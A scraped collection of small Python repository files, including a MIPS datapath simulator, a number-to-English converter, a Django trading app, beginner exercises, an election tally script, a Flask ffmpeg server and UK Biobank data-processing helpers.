self.cpu.memory.set_value(alu_result, register_data2)
print("Write data: {}{}[{}]".format(register_data2, ' '*6, to_decimalC2(register_data2)))
print("{}".format("-" * 64))
print("\n\n")
| Python | 225 | 34.373333 | 98 | /control.py | 0.563513 | 0.541777 |
AntLouiz/DatapathWay | refs/heads/master | from li import FUNCTIONS
from utils import extend_to_bits
class MipsInstruction:
op = None
rs = None
rt = None
rd = None
shamt = None
func = None
offset = None
instruction_type = None
instruction = None
def __init__(self, instruction):
if not (isinstance(instruction, str) or len(instruction) == 32):
raise Exception()
self.instruction = instruction.replace('\n', '')
self.op = self.instruction[:6]
if self.op == '000000':
self._configure_to_registers()
else:
self._configure_to_imediate()
def _configure_to_imediate(self):
self.instruction_type = 'I'
self.rs = self.instruction[6:11]
self.rt = self.instruction[11:16]
self.offset = self.instruction[16:32]
return self.instruction
def _configure_to_registers(self):
self.instruction_type = 'R'
self.rs = self.instruction[6:11]
self.rt = self.instruction[11:16]
self.rd = self.instruction[16:21]
self.shamt = self.instruction[21:26]
self.func = self.instruction[26:32]
return self.instruction
def has_offset(self):
if self.instruction_type == 'R':
return False
return True
def get_type(self):
return self.instruction_type
def get_function(self):
return self.func
def get_registers(self):
registers = {
'rs': self.rs,
'rt': self.rt,
'rd': self.rd
}
return registers
def get_offset(self):
if not self.has_offset():
return None
return extend_to_bits(self.offset)
def get_func(self):
if self.op != '000000':
return FUNCTIONS[self.op]
return FUNCTIONS[self.func]
def __repr__(self):
representation = "-" * 64
representation += \
"\nInstruction: {}\nType: {}\nOperation: {}\n".format(
self.instruction,
self.instruction_type,
self.get_func()
)
representation += "-" * 64
return representation
class PC:
def __init__(self, filename="instructions_file.txt"):
self.file = open(filename, 'r')
self.next_instruction = None
def get_instructions(self):
"""
Return a mips instruction object
for each instruction in the file
"""
for instruction in self.file.readlines():
if self.next_instruction:
self.next_instruction = MipsInstruction(instruction)
else:
self.next_instruction = MipsInstruction(instruction)
yield self.next_instruction
| Python | 108 | 24.824074 | 72 | /instructions.py | 0.550018 | 0.532449 |
AntLouiz/DatapathWay | refs/heads/master | import random
from utils import to_binary, extend_to_bits, to_binaryC2
class BaseMemory:
def __init__(self):
self.data = {}
def set_value(self, address, value):
"""
Set a value with a given address
"""
self.data[address] = value
return True
def get_value(self, address):
"""
Return a value with a given address
"""
return self.data[address]
class RegistersBank(BaseMemory):
data = {}
def __new__(cls, *args, **kwargs):
"""
Make the BaseMemory a Monostate class
"""
obj = super(RegistersBank, cls).__new__(cls, *args, **kwargs)
obj.__dict__ = cls.data
return obj
def __init__(self):
total_registers = 2**5
for i in range(total_registers):
binary_number = to_binary(i)
if len(binary_number) < 5:
zero_fill = 5 - len(binary_number)
binary_number = "{}{}".format(
"0" * zero_fill,
binary_number
)
if i == 8:
self.data[binary_number] = extend_to_bits(to_binary(16))
else:
self.data[binary_number] = False
class Memory(BaseMemory):
data = {}
def __new__(cls, *args, **kwargs):
"""
Make the BaseMemory a Monostate class
"""
obj = super(Memory, cls).__new__(cls, *args, **kwargs)
obj.__dict__ = cls.data
return obj
def __init__(self):
total_data = 2**8
for i in range(total_data):
binary_number = to_binary(i)
binary_number = extend_to_bits(to_binary(i))
random_number = to_binaryC2(
random.randint(-(2**31), (2**31) - 1)
)
self.data[binary_number] = random_number
| Python | 79 | 22.632912 | 72 | /memory.py | 0.494111 | 0.48394 |
AntLouiz/DatapathWay | refs/heads/master | from core import CPU
if __name__ == "__main__":
cpu = CPU()
cpu.execute()
| Python | 6 | 13 | 26 | /main.py | 0.511905 | 0.511905 |
alex2060/job1 | refs/heads/main | import requests
r = requests.get('http://127.0.0.1:8080/number?number=1')
#print(r.status_code)
#print(r.text)
if "One" in r.text:
print("Passed Test")
else:
print("Failed Test")
if "Ok" in r.text:
print("Passed Test")
else:
print("Failed Test")
r = requests.get('http://127.0.0.1:8080/number?number=8')
#print(r.status_code)
#print(r.text)
if "Eight" in r.text:
print("Passed Test")
else:
print("Failed Test")
r = requests.get('http://127.0.0.1:8080/number?number=5A')
#print(r.status_code)
#print(r.text)
if "Five" in r.text:
print("Failed Test")
else:
print("Passed Test")
if "NAN" in r.text:
print("Passed Test")
else:
print("Failed Test")
r = requests.get('http://127.0.0.1:8080/number?number=')
#print(r.status_code)
#print(r.text)
if "NAN" in r.text:
print("Passed Test")
else:
print("Failed Test")
r = requests.get('http://127.0.0.1:8080/number?number=1000000000000000000000000000')
#print(r.status_code)
#print(r.text)
if "NTL" in r.text:
print("Passed Test")
else:
print("Failed Test")
r = requests.get('http://127.0.0.1:8080/number')
print(r.status_code)
print(r.text)
if "NAN" in r.text:
print("Passed Test")
else:
print("Failed Test")
r = requests.get('http://127.0.0.1:8080/number',data = {'number': '1'})
print(r.status_code)
print(r.text)
if "NAN" in r.text:
print("Passed Test")
else:
print("Failed Test")
| Python | 72 | 18.569445 | 84 | /pyspark/django_form_other_project/mysite/tests.py | 0.645138 | 0.572747 |
alex2060/job1 | refs/heads/main |
#https://www.vocabulary.cl/Basic/Numbers.html
###
"""
This is basic program for converting a string value of number into upto 999,999,999 into english
The program works baised on the number english convertion in the websight https://www.vocabulary.cl/Basic/Numbers.html
it is not object based as in my opinion simple operations should be single call functions not classes in order to make outside code
cleaner.
"""
#For adding a 100 to a three digent numbers
def one_hundreds(number):
if number=="0":
return ""
return ""+one(number)+" hundred"
#Converting a 1 diget string number to english
def one(number):
value=number
if value=="0":
return "zero"
if value=="1":
return "one"
if value=="2":
return "two"
if value=="3":
return "three"
if value=="4":
return "four"
if value=="5":
return "five"
if value=="6":
return "six"
if value=="7":
return "seven"
if value=="8":
return "eight"
if value=="9":
return "nine"
#Converting a 2 diget string number to english in the case where the first diget is a 1
def teens(number):
value=number
if value=="0":
return "ten"
if value=="1":
return "eleven"
if value=="2":
return "twelve"
if value=="3":
return "thirteen"
if value=="4":
return "fifteen"
if value=="5":
return "fifteen"
if value=="6":
return "sixteen"
if value=="7":
return "seventeen"
if value=="8":
return "eighteen"
if value=="9":
return "nineteen"
#For adding dashes in between the 10s place and the 1s place for three diget number stings a helper function for the funtion tens
def ones(number):
if number=="0":
return ""
return "-"+one(number)
#Converting a 2 diget string number to english
def tens(number):
value=number[0]
number=number[1]
if value=="0":
return one(number)
if value=="1":
return teens(number)
if value=="2":
return "twenty"+ones(number)
if value=="3":
return "thirty"+ones(number)
if value=="4":
return "forty"+ones(number)
if value=="5":
return "fifty"+ones(number)
if value=="6":
return "sixty"+ones(number)
if value=="7":
return "seventy"+ones(number)
if value=="8":
return "eighty"+ones(number)
if value=="9":
return "ninety"+ones(number)
#Converting a 3 diget string number to english for values greater then one thousand
def hundreds_extion(number,ening_value):
adder=tens( number[1]+number[2] )
if number[0]!="0":
if adder!="zero":
adder=" and "+adder
else:
adder=""
out=one_hundreds( number[0] )+adder
if out=="zero":
out=""
else:
out=out+ening_value
return out
#Converting a 3 diget string number to english for values less then one thousand
def hundreds(number):
adder=tens( number[1]+number[2] )
if number[0]!="0":
if adder!="zero":
adder=" and "+adder
else:
adder=""
return one_hundreds( number[0] )+adder
#Converting a 9 diget number to english.
def Numb_to_english(number):
#Pad the number if it to short
number_holder=len(number)
for x in range(number_holder,9):
number="0"+number
#Check if the number is to lonmg
if len(number)!=9:
return "NTL"
#Check if its not a number
for x in range(len(number)):
if number[x].isnumeric() !=True:
return "NAN"
millons_coma=""
thosands_coma=""
#get the ending string
ending=hundreds(str(number[6]+number[7]+number[8]))
#get the thousand place string
thousand_place=hundreds_extion(number[3]+number[4]+number[5]," thousand ")
#get the millons place string
millons_place=hundreds_extion(number[0]+number[1]+number[2]," million ")
#check and see if the value is zero
if thousand_place!="" or millons_place!="":
if ending=="zero":
ending=""
#check and see if there needs to be after millons
if millons_place!="":
if ending!="" or thousand_place!="":
millons_coma=", "
if number[3]=="0":
millons_coma=", and "
#check and see if there needs to be after the thousand place
if thousand_place!="":
if ending!="":
thosands_coma=", "
# adding and for case where there is no hudreds
if number[6]=="0":
thosands_coma=", and "
#Capitalize First letter
theoutput=millons_place+millons_coma+thousand_place+thosands_coma+ending
fist_char=theoutput[0].upper()
final_output=""
for x in range(1, len(theoutput) ):
final_output+=theoutput[x]
return fist_char+final_output+"."
| Python | 202 | 20.282179 | 132 | /pyspark/django_form_other_project/mysite/number_to_english.py | 0.671306 | 0.651821 |
alex2060/job1 | refs/heads/main | from django.shortcuts import render
from django.http import HttpResponse
import time
from django.core.files import File
# Create your views here.
import lets_convert
from django.shortcuts import render
import mysql_test
def traider(req):
f = open("to_be_frontend_check_make_traid.html", "r")
output= f.read()
f.close()
return HttpResponse( output )
def add_traid(req):
f = open("add_user.html", "r")
output= f.read()
f.close()
return HttpResponse( output )
def compleat_traid(req):
f = open("to_be_frontend_check_fin_traid.html", "r")
output= f.read()
f.close()
return HttpResponse( output )
def print_convertion(req):
f = open("transaction.html", "r")
output= f.read()
f.close()
return HttpResponse( output )
def print_user(req):
f = open("to_be_frontend_check_user.html", "r")
output= f.read()
f.close()
return HttpResponse( output )
def pyspark(req):
return HttpResponse( "output6" )
def reset(req):
return HttpResponse( "output6" )
def doit(req):
print("in here")
#return HttpResponse( "mysting" )
action_type=""
try:
action_type=req.GET["action_type"]
except:
action_type=""
user=""
try:
user=req.GET["user"]
except:
user=""
email=""
try:
email=req.GET["email"]
except:
email=""
phone=""
try:
phone=req.GET["phone"]
except:
phone=""
password=""
try:
password=req.GET["password"]
except:
pass
traid_id=""
try:
traid_id=req.GET["traid_id"]
except:
pass
request_amound=""
try:
request_amound=float(req.GET["request_amound"])
except:
pass
request_type=""
try:
request_type=req.GET["request_type"]
except:
pass
send_type=""
try:
send_type=req.GET["send_type"]
except:
pass
send_amount=""
try:
send_amount=float(req.GET["send_amount"])
except:
pass
#127.0.0.1:8000/doit?action_type=adduser&user=v1&email=a&password=1&phone=1
#127.0.0.1:8000/doit?action_type=adduser&user=v3&email=a&password=1&phone=1
if action_type=="adduser":
if password!="":
pass
else:
return HttpResponse( "blank1" )
if user!="":
pass
else:
return HttpResponse( "blank2" )
if email!="":
pass
else:
return HttpResponse( "blank3" )
if phone!="":
pass
else:
return HttpResponse( "blank4" )
out=mysql_test.makeuseremail(user,email,password)
return HttpResponse( out )
#127.0.0.1:8000/doit?action_type=maketraid&user=v1&password=1&request_type=money1&send_type=money2&request_amound=1&send_amount=1
#SELECT * from `traidtable` WHERE `traid_id` LIKE 'mvqtpftuhlmhcyfneazdyysmouaajaobhaoxesqycbrrryjbbnwjnvhkopzzhaya';
if action_type=="maketraid":
if password!="":
pass
else:
return HttpResponse( "blank1" )
if user!="":
pass
else:
return HttpResponse( "blank2" )
if request_type not in ["money1","money2"]:
return HttpResponse( "blank4",request_type," done " )
if send_type not in ["money1","money2"]:
return HttpResponse( "blank5" )
if send_type==request_type:
return HttpResponse( "blank6" )
if request_amound=="":
return HttpResponse( "blank7" )
if send_amount=="":
return HttpResponse( "blank8" )
out=mysql_test.funtion_make_traid(user,password,request_type,request_amound,send_type,send_amount)
return HttpResponse( out )
#127.0.0.1:8000/doit?action_type=fintraid&user=v2&password=1&traid_id=vyyyihrlgoefyiznjngvnpgwaeduqqgpottlkgjrawvfeooinulyxwhgcezyhuej
if action_type=="fintraid":
if password!="":
pass
else:
return HttpResponse( "blank1" )
if user!="":
pass
else:
return HttpResponse( "blank2" )
if traid_id =="":
return HttpResponse( "blank4" )
out=mysql_test.compleat_traid(user,password,traid_id)
mysql_test.log_traid(out)
return HttpResponse( out )
#127.0.0.1:8000/doit?action_type=print_convertion
if action_type=="print_convertion":
return HttpResponse( mysql_test.print_convertions("</br>") )
#127.0.0.1:8000/doit?action_type=reset_convertion
if action_type=="reset_convertion":
mysql_test.reset_convertion()
return HttpResponse( "done" )
#127.0.0.1:8000/doit?action_type=Uprint&user=v2
if action_type=="Uprint":
return HttpResponse(mysql_test.user_acount(user,"</br>"))
mysting=action_type+","+user+","+password+","+traid_id+","+request_amound+","+request_type+","+send_type+","+send_amount
return HttpResponse( mysting )
def get_from_cash(req):
return render_to_response('./test.html')
| Python | 222 | 22.013514 | 138 | /pyspark/django_form_other_project/mysite/numb/views.py | 0.584375 | 0.563867 |
alex2060/job1 | refs/heads/main | from django.urls import path
from . import views
urlpatterns = [
path('traider', views.traider,name='traider'),
path('add_traid', views.add_traid,name='add_traid'),
path('compleat_traid', views.compleat_traid,name='compleat_traid'),
path('get_user_info', views.print_convertion,name='get_user_info'),
path('convertion', views.print_convertion,name='convertion'),
path('print_user', views.print_user,name='print_user'),
path('doit', views.doit,name='doit')
]
#print_user
| Python | 15 | 32.200001 | 71 | /pyspark/django_form_other_project/mysite/numb/url.py | 0.691383 | 0.691383 |
zhuliyi10/python_demo | refs/heads/master | from mymodule import sayhello,__version__
sayhello()
print('version:',__version__)
| Python | 4 | 20 | 41 | /models/mymodule_demo.py | 0.714286 | 0.714286 |
zhuliyi10/python_demo | refs/heads/master | def func(a, b=5, c=10):
print('a=', a, ' b=', b, ' c=', c)
func(2, 7)
func(2, c=23)
func(c=23,a=9)
| Python | 7 | 14 | 38 | /function/function_key.py | 0.447619 | 0.342857 |
zhuliyi10/python_demo | refs/heads/master | number = 23
while True:
guess = int(input('请输入一个整数:'))
if guess == number:
print('恭喜,你猜对了。')
break
elif guess < number:
print('你猜小了')
else:
print('你猜大了')
print('end')
| Python | 13 | 15.692307 | 34 | /if.py | 0.509174 | 0.5 |
zhuliyi10/python_demo | refs/heads/master | age = 20
name = 'zhuly'
print('{0} was {1} years old'.format(name, age))
| Python | 3 | 23.333334 | 48 | /base.py | 0.616438 | 0.561644 |
zhuliyi10/python_demo | refs/heads/master |
def reverse(text):
return text[::-1]
def is_palindrome(text):
return text == reverse(text)
something=input('输入文本:')
if is_palindrome(something):
print("是的,这是回文")
else:
print("这不是回文")
| Python | 14 | 13.571428 | 32 | /input_output/user_input.py | 0.639024 | 0.634146 |
zhuliyi10/python_demo | refs/heads/master | def sayHello():
print('hello world,hello python!')
sayHello() | Python | 4 | 15.75 | 38 | /function/function.py | 0.681818 | 0.681818 |
zhuliyi10/python_demo | refs/heads/master | def total(a=5,*numbers,**phonebook):
print('a',a)
#通过元组遍历全部的参数
for item in numbers:
print('num_item',item)
#通过字典遍历全部的参数
for first,second in phonebook.items():
print(first,second)
total(10,1,2,3,Name='zhuly',age=26)
| Python | 12 | 20.5 | 43 | /function/total.py | 0.608527 | 0.577519 |
zhuliyi10/python_demo | refs/heads/master | import pickle
# 我们将要存储对象的文件名
shoplistfile = 'shoplist.data'
# 购物清单
shoplist = ['苹果', '芒果', '胡萝卜']
# 定到文件
f = open(shoplistfile, 'wb')
pickle.dump(shoplist, f)
f.close()
del shoplist # 释放shoplist变量
# 从仓库读回
f = open(shoplistfile, 'rb')
storedlist = pickle.load(f)
f.close()
print(storedlist)
| Python | 21 | 13.142858 | 30 | /input_output/pickling.py | 0.686869 | 0.686869 |
zhuliyi10/python_demo | refs/heads/master | import sys
print('命令行参数是:')
for i in sys.argv:
print(i)
print("python path is in ",sys.path) | Python | 6 | 15.333333 | 36 | /models/using_sys.py | 0.670103 | 0.670103 |
zhuliyi10/python_demo | refs/heads/master |
def sayhello():
print('hello wolrd,hello python!')
__version__='0.1'
| Python | 4 | 17.5 | 38 | /models/mymodule.py | 0.613333 | 0.586667 |
zhuliyi10/python_demo | refs/heads/master | poem = '''\
当工作完成时
编程是有趣的
如果想让你的工作有趣
使用Python!
'''
f = open('poem.txt', 'w')
f.write(poem)
f.close()
f = open('poem.txt', 'r')
while(True):
line = f.readline()
if len(line) == 0:
break
print(line, end='')
f.close()
| Python | 19 | 11.736842 | 25 | /input_output/using_file.py | 0.541322 | 0.53719 |
akkheyy/Python-Challenge | refs/heads/master | import os
import csv
csvpath = os.path.join('election_data.csv')
#Variables
votes = 0
candidate_list = []
candidate_count = []
candidate_percent = []
with open("election_data.csv", "r") as in_file:
csv_reader = csv.reader(in_file)
header = next(csv_reader)
for row in csv_reader:
#Adds total number of votes
votes += 1
candidate = row[2]
#If a candidate is in Candidate List, indexes the candidate on Candidate List, finds the index on Candidate Count List, and increases their number of votes by 1
if candidate in candidate_list:
candidate_index = candidate_list.index(candidate)
candidate_count[candidate_index] += 1
#If a candidate is not in Candidate List, adds candidate to Candidate List, and increases the candidates vote count by 1 on Candidate Count
else:
candidate_list.append(candidate)
candidate_count.append(1)
#Finds the percent of votes each candidate received, and adds the percentage to the Candidate Percent List
for e in range(len(candidate_list)):
vote_percent = round((candidate_count[e]/votes) * 100, 2)
candidate_percent.append(vote_percent)
#Finds the Overall Election Winner by finding the candidate listed the maximum amount of times
winning_candidate = max(candidate_list, key = candidate_list.count)
#Print Results to Terminal
print("_____________________________")
print(" Election Results")
print("_____________________________")
print("Total Votes: " + str(votes))
print("_____________________________")
for e in range(len(candidate_list)):
print(f'{candidate_list[e]} : {candidate_count[e]} votes : {candidate_percent[e]}%')
print("_____________________________")
print("Winner: " + str(winning_candidate))
print("_____________________________")
#Create and write to Election_Results TXT File
outpath = os.path.join("Election_Results.txt")
txt_file = open("Election_Results.txt", "w")
txt_file.write("_____________________________\n")
txt_file.write(" Election Results\n")
txt_file.write("_____________________________\n")
txt_file.write("Total Votes: " + str(votes))
txt_file.write("\n_____________________________\n")
for e in range(len(candidate_list)):
txt_file.write(f'{candidate_list[e]} : {candidate_count[e]} votes : {candidate_percent[e]}%\n')
txt_file.write("_____________________________\n")
txt_file.write("Winner: " + str(winning_candidate))
txt_file.write("\n_____________________________")
| Python | 66 | 37.166668 | 168 | /PyPoll/main.py | 0.598416 | 0.594059 |
JPisaBrony/FFProcServer | refs/heads/master | from flask import Flask, request, jsonify
from subprocess import Popen, PIPE
import uuid
import os
import json
app = Flask("ffserver", static_url_path='')
processing = False
@app.route("/")
def root():
return app.send_static_file("index.html")
@app.route("/ffmpeg", methods=['POST'])
def ffmpeg():
global processing
if processing == True:
return jsonify({ "result": "processing..." })
processing = True
vidID = str(uuid.uuid4())
outDir = "static/" + vidID
os.makedirs(outDir)
cmd = request.json["cmd"].replace("ffmpeg ", "").replace("\"", "")
cmdArgs = ["ffmpeg", "-loglevel", "error"]
for c in cmd.split(" "):
cmdArgs.append(c)
proc = Popen(cmdArgs, cwd=outDir, stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
result = proc.wait()
processing = False
if result == 1:
os.rmdir(outDir)
return jsonify({"error": stderr})
return jsonify({ "result": vidID + "/" + cmdArgs[-1] })
if __name__ == "__main__":
app.run(host='0.0.0.0')
| Python | 39 | 25.794872 | 70 | /ffserver.py | 0.607656 | 0.600957 |
postincredible/ukbb | refs/heads/master |
import os
import pandas as pd
import numpy as np
pth=os.getcwd()
spliter=pth.split('/')[-1]
rel_var_path=pth.split(spliter)[0]+'disease/'
rel_var_path
def load_data_by_fid(fid):
df_tab1_i0_comp=pd.read_csv('/temp_project/ukbb/data/i0/ukb22598_i0_comp.csv')
if int(fid) in df_tab1_i0_comp.fid.values.tolist():
fid_num=fid
var_type=df_tab1_i0_comp[df_tab1_i0_comp['fid']==int(fid_num)].Type.values[0]
var_type_list=['con','cur','dat','int','tex','tim','cas','cam']
var_type_list_full=['Continuous','Curve','Date','Integer','Text','Time','Categorical (single)', 'Categorical (multiple)']
path_p1='/temp_project/ukbb/data/i0/var_'
if var_type in var_type_list_full:
vtyp=var_type_list[var_type_list_full.index(var_type)]
loadpath=path_p1+str(vtyp)+'/'
os.chdir(path_p1+str(vtyp))
list_folder=os.listdir()
pname1=str(vtyp)+str(fid_num)+'i0.csv'
pname2='vec_'+str(vtyp)+str(fid_num)+'i0.csv'
if pname1 in list_folder:
print('fid ' + str(fid_num) + ' is a single-measure '+str(var_type).lower()+' variable')
fpname=list_folder[list_folder.index(pname1)]
df_load=pd.read_csv(loadpath+fpname)
elif pname2 in list_folder:
print('fid ' + str(fid_num) + ' is a multiple-measure '+str(var_type).lower()+' variable')
fpname=list_folder[list_folder.index(pname2)]
df_load=pd.read_csv(loadpath+fpname, sep='\t')
return df_load
else:
print('fid not found, please try again')
df_tab1_i0_comp=pd.read_csv('/temp_project/ukbb/data/i0/ukb22598_i0_comp.csv')
def cd_path(path):
"""
Check if path exists, if not create it
"""
if os.path.exists(path):
print(path+' already exists!')
else:
os.mkdir(path)
print(path+' is now created!')
def chk_unique_eid(df):
"""
Check unique eid number for a dataframe
"""
print('loaded df has unique eid count: '+ str(len(df.eid.unique())))
def search_des(keyword):
"""
search 'keyword' related variable based on the variable description
"""
klow=str(keyword).lower()
df_tab1_i0_comp['des']=df_tab1_i0_comp.Description.str.lower()
key_des=df_tab1_i0_comp[df_tab1_i0_comp.des.str.contains(klow)][['fid','Type','obs_ct','Description','DC']]
return key_des
def related_vars(key_list, dis):
"""
return a dataframe contains all searched 'keyword' related variable in 'key_list'
"""
savepath1=rel_var_path ##### CHANGE path if needed
savepath2=savepath1+str(dis).upper()
if os.path.exists(savepath2):
os.chdir(savepath2)
d_lst=[]
for k in key_list:
df_k=search_des(str(k).strip())
d_lst.append(df_k)
d_coma=pd.concat(d_lst)
d_comb=d_coma.drop_duplicates()
print('Searched keyword(s): '+str(key_list)+'\n'+'save '+str(dis)+'_related_vars_chk.csv file at '+str(savepath2))
filename=str(dis)+'_related_vars_chk.csv'
d_comb.to_csv(filename, index=None)
return d_comb
else:
os.mkdir(savepath2)
os.chdir(savepath2)
d_lst=[]
for k in key_list:
df_k=search_des(str(k).strip())
d_lst.append(df_k)
d_coma=pd.concat(d_lst)
d_comb=d_coma.drop_duplicates()
print('Searched keyword(s): '+str(key_list)+'\n'+'save '+str(dis)+'_related_vars_chk.csv file at '+str(savepath2))
filename=str(dis)+'_related_vars_chk.csv'
d_comb.to_csv(filename, index=None)
return d_comb
def lst_ind(dfa_list,ind_val):
"""
return a list of icd code that match with 'ind_val'
"""
pre0=[]
for i in dfa_list:
if pd.isnull(i):
pre0.append([])
elif pd.notnull(i):
si=[]
jl=i.split(',')
for ei in jl:
ef=ei.replace(',','')
efa,efb,efc=ef.partition(str(ind_val))
if efa=='':
si.append(ef)
pre0.append(si)
return pre0
################ functions in std UKBB data ######################
def mm_gen_ind_raw(fid_int,key_code,evnt, detail=False, get_ct=False, ct_only=False):
"""
return a dataframe that contains indicator variable for a specific 'key_code' in UKBB std data
use 'detail=True' to get the detail matched code info
use 'get_ct=True' to get the count for matched code
use 'ct_only=True' to return count only
"""
dfc=load_data_by_fid(fid_int)
#df_icd9m=dfc.copy()
dfa=dfc.copy()
dfa_lst=dfa[dfa.columns[1]].values.tolist()
pre0=lst_ind(dfa_lst,str(key_code))
gen_fid_name='fid'+str(fid_int)+'_'+str(evnt)+str(key_code)
gen_ind_name='ind'+str(fid_int)+'_'+str(evnt)+str(key_code)
gen_count_name='count'+str(fid_int)+'_'+str(evnt)+str(key_code)
dfa[str(gen_fid_name)]=pre0
dfa[dfa.columns[dfa.columns.get_loc(str(gen_fid_name))]]=dfa[dfa.columns[dfa.columns.get_loc(str(gen_fid_name))]].apply(lambda y: np.nan if len(y)==0 else y )
dfa[str(gen_ind_name)]=pre0
dfa[dfa.columns[dfa.columns.get_loc(str(gen_ind_name))]]=dfa[dfa.columns[dfa.columns.get_loc(str(gen_ind_name))]].apply(lambda y: 0 if len(y)==0 else 1 )
dfa[str(gen_count_name)]=pre0
dfa[dfa.columns[dfa.columns.get_loc(str(gen_count_name))]]=dfa[dfa.columns[dfa.columns.get_loc(str(gen_count_name))]].apply(lambda y: 0 if len(y)==0 else len(y) )
print('fid '+str(fid_int)+' ',str(evnt)+str(key_code)+' count: '+str(dfa[dfa.columns[dfa.columns.get_loc(str(gen_fid_name))]].count())+' ind from '+str(dfa[dfa.columns[dfa.columns.get_loc(str(gen_ind_name))]].count()))
dfb=dfa[['eid',str(gen_ind_name),str(gen_count_name)]]
#dfb=dfa[['eid',str(gen_ind_name)]]
if ct_only==False:
if detail==True:
if get_ct==True:
return dfa
if get_ct==False:
return dfa.drop([str(gen_count_name)],axis=1)
else:
if get_ct==True:
return dfb
if get_ct==False:
return dfb.drop([str(gen_count_name)],axis=1)
if ct_only==True:
return dfb.drop([str(gen_ind_name)],axis=1)
def mm_gen_ind_list(fid_in, key_code_list, evt, detai=False, get_ct=False, ct_only=False):
"""
return a dataframe that contains indicator variables for each specific 'key_code' in 'key_code_list'
use 'detai= True' to get the detail matched codes info
use 'get_ct=True' to get the count for matched codes
use 'ct_only=True' to return counts only
"""
dfcl=[]
if ct_only==False:
if detai==False:
if get_ct==False:
for l in key_code_list:
df_l=mm_gen_ind_raw(fid_in, l, str(evt), detail=False, get_ct=False, ct_only=False)
dfcl.append(df_l)
dfcl_merge=pd.concat(dfcl,axis=1)
dfcl_merge=dfcl_merge.loc[:,~dfcl_merge.columns.duplicated()] # drop duplicated 'eid' columns
return dfcl_merge
if get_ct==True:
for l in key_code_list:
df_l=mm_gen_ind_raw(fid_in, l, str(evt), detail=False, get_ct=True, ct_only=False)
dfcl.append(df_l)
dfcl_merge=pd.concat(dfcl,axis=1)
dfcl_merge=dfcl_merge.loc[:,~dfcl_merge.columns.duplicated()] # drop duplicated 'eid' columns
return dfcl_merge
if detai==True:
if get_ct==False:
for l in key_code_list:
df_l=mm_gen_ind_raw(fid_in, l, str(evt), detail=True, get_ct=False, ct_only=False)
dfcl.append(df_l)
dfcl_merge=pd.concat(dfcl,axis=1)
dfcl_merge=dfcl_merge.loc[:,~dfcl_merge.columns.duplicated()] # drop duplicated 'eid' columns
return dfcl_merge
if get_ct==True:
for l in key_code_list:
df_l=mm_gen_ind_raw(fid_in, l, str(evt), detail=True, get_ct=True, ct_only=False)
dfcl.append(df_l)
dfcl_merge=pd.concat(dfcl,axis=1)
dfcl_merge=dfcl_merge.loc[:,~dfcl_merge.columns.duplicated()] # drop duplicated 'eid' columns
return dfcl_merge
if ct_only==True:
for l in key_code_list:
df_l=mm_gen_ind_raw(fid_in, l, str(evt), detail=False, get_ct=False, ct_only=True)
dfcl.append(df_l)
dfcl_merge=pd.concat(dfcl,axis=1)
dfcl_merge=dfcl_merge.loc[:,~dfcl_merge.columns.duplicated()] # drop duplicated 'eid' columns
return dfcl_merge
def gen_event_ind_from_list(fid_int, event_code_list):
"""
return a dataframe that contains indicator variables for each pair of event and its related ICD code
"""
df_pool=[]
for lev1 in event_code_list:
print('load event: '+ str(lev1[0]))
for_event= lev1[0]
for_code= lev1[1]
#df_name= 'df_ind'+str(fid_int)+'_'+str(for_event)
df_pool_element=mm_gen_ind_list(fid_in=fid_int, evt=for_event, key_code_list=for_code)
df_pool.append(df_pool_element)
df_pooled=pd.concat(df_pool,axis=1)
df_pooled=df_pooled.loc[:,~df_pooled.columns.duplicated()] # drop duplicated 'eid' columns
return df_pooled
def gen_event_ind_from_multi_var(fid_list, event_code_list,detail=False):
"""
return a dataframe that contains indicator variables for each event combined multiple icd measurements
"""
f_pool=[]
for f in fid_list:
print('\n working on fid= '+str(f))
f_pool_element= gen_event_ind_from_list(fid_int=f, event_code_list=event_code_list)
f_pool.append(f_pool_element)
f_pooled= pd.concat(f_pool,axis=1)
f_pooled=f_pooled.loc[:,~f_pooled.columns.duplicated()] # drop duplicated 'eid' columns
if detail==True:
return f_pooled
if detail==False:
ind_pool=[]
for e in event_code_list:
event=e[0]
df_pre=f_pooled.filter(regex=event)
ind_name='icd_ind_'+str(event)
leid=f_pooled.eid
ind_sum=df_pre.sum(axis=1)
df_e=pd.DataFrame({'eid':leid, ind_name:ind_sum})
df_e[ind_name]=df_e[ind_name].apply(lambda y: 1 if y>0 else y)
df_e=df_e.loc[:,~df_e.columns.duplicated()] # drop duplicated 'eid' columns
ind_pool.append(df_e)
#df_e=f_pooled[['eid']].copy()
#ind_name='icd_ind_'+str(event)
#df_e[str(ind_name)]=df_pre.sum(axis=1)
#df_e.ind_name=df_pre.sum(axis=1)
#df_e[ind_name]=df_pre.sum(axis=1)
#df_e.ind_name=df_e.ind_name.apply(lambda y: 1 if y>0 else y)
#ind_pool.append(df_e)
ind_pooled= pd.concat(ind_pool,axis=1)
ind_pooled=ind_pooled.loc[:,~ind_pooled.columns.duplicated()] # drop duplicated 'eid' columns
return ind_pooled
############# functions for HES ################
def hes_gen_ind_raw(icd,hesin_dfin,key_code,evnt, detail=False):
"""
return a dataframe that contains indicator variable for a specific 'key_code' in HES data
use 'detail= True' to get the detail matched code info
"""
#dfc=load_data_by_fid(fid_int)
#df_icd9m=dfc.copy()
#dfa=hesin[['eid',str(icd)]].copy()
dfa=hesin_dfin[['eid','record_id',str(icd)]].copy()
dfa_lst=dfa[dfa.columns[dfa.columns.get_loc(str(icd))]].values.tolist()
pre0=lst_ind(dfa_lst,str(key_code))
gen_hes_name='hes_'+str(icd)+'_'+str(evnt)+str(key_code)
gen_ind_name='ind_'+str(icd)+'_'+str(evnt)+str(key_code)
dfa[str(gen_hes_name)]=pre0
dfa[dfa.columns[dfa.columns.get_loc(str(gen_hes_name))]]=dfa[dfa.columns[dfa.columns.get_loc(str(gen_hes_name))]].apply(lambda y: np.nan if len(y)==0 else y )
dfa[str(gen_ind_name)]=pre0
dfa[dfa.columns[dfa.columns.get_loc(str(gen_ind_name))]]=dfa[dfa.columns[dfa.columns.get_loc(str(gen_ind_name))]].apply(lambda y: 0 if len(y)==0 else 1 )
print('\nHES '+str(icd)+' ',str(evnt)+'('+str(key_code)+')'+' count: '+str(dfa[dfa.columns[dfa.columns.get_loc(str(gen_hes_name))]].count())+',\nFreq_tab \n'+str(dfa[dfa.columns[dfa.columns.get_loc(str(gen_ind_name))]].value_counts()))
dfb=dfa[['eid','record_id',str(gen_ind_name)]]
if detail==True:
return dfa
else:
return dfb
def hes_gen_ind_list(icd_in, hesin_dfin, key_code_list, evt, detai=False):
"""
